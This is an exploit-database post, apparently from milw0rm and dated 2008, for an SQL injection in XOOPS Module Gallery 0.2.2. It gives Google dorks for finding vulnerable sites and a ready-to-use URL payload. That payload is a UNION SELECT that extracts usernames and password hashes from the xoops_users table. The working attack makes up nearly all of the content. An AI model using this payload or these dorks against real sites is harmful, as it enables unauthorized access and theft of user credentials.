31 lines
No EOL
890 B
Text
31 lines
No EOL
890 B
Text
##########################################
|
|
#
|
|
# XOOPS Module Gallery 0.2.2 SQL Injection Exploit
|
|
#
|
|
##########################################
|
|
#
|
|
##AUTHOR : S@BUN
|
|
#
|
|
####HOME : http://www.milw0rm.com/author/1334
|
|
####HOME : http://securityreason.com/search/101/c0BidW4=/1/0
|
|
#
|
|
####MAÄ°L : hackturkiye.hackturkiye@gmail.com
|
|
#
|
|
###########################################
|
|
#
|
|
# DORKS 1 : allinurl :"modules/gallery"
|
|
#
|
|
# DORK 2 : allinurl :"modules/gallery"gid
|
|
#
|
|
###########################################
|
|
EXPLOIT :
|
|
|
|
modules/gallery/index.php?do=showgall&gid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass),3,4,5,6/**/from/**/xoops_users/*
|
|
|
|
###########################################
|
|
##################S@BUN####################
|
|
###########################################
|
|
#####hackturkiye.hackturkiye@gmail.com#####
|
|
###########################################
|
|
|
|
# milw0rm.com [2008-03-12] |